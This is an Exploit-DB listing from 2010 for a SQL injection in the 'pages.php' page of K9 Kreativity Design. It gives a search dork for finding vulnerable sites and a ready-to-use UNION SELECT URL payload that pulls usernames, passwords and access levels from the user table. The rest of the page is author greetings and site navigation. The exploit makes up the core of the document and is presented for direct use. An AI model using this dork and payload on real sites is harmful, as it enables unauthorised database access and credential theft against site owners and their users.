K9 Kreativity Design - 'pages.php' SQL Injection

EDB-ID:

12866

CVE:

N/A

EDB Verified:

Author:

Newbie_Campuz

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-06-03

Vulnerable App:

==========================================================
K9 Kreativity Design  (pages.php) SQL Injection Vulnerability
==========================================================

##########################################################
[+] K9 Kreativity Design (pages.php) SQL Injection Vulnerability
[+] By Newbie_Campuz
[+] Published: 2010-06-02 Pukul 21.00 WIB
[+] jatimcrew.org/
##########################################################

# Script Homepage:
# http://www.k9kreativity.co.uk/

[+]Dork: "pages.php?page_ID=" "K9 Kreativity"

[+] SQL Injection


	http://[target]/pages.php?page_ID=[SQL]

	http://[target]/pages.php?page_ID=-9999%20union%20select%201,2,3,4,5,6,7,8,9,group_concat(username,0x3a,password,0x3a,user_accesslevel),11,12,13,14,15,16%20from%20user--

##########################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to : 	
My Parent, My Brother n My Sister
Byz9991, Doraemon, Bang_Napi, Dark_anvanger, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, phoenixhaxor, mywisdom, 
Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, inurl, Osean, Vhacx, jamsh0ut, elfata, vickry_shahab
cybermuttaqin, k3m4ngi, roentah, zhombhie, techno_x46 and YOU... !!!

All admin, momod, spamguard, staff and member Jatim Crew..
All admin, momod, spamguard, staff and member xteamweb
All admin, momod, spamguard, staff and member h2ozones

##########################################################

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services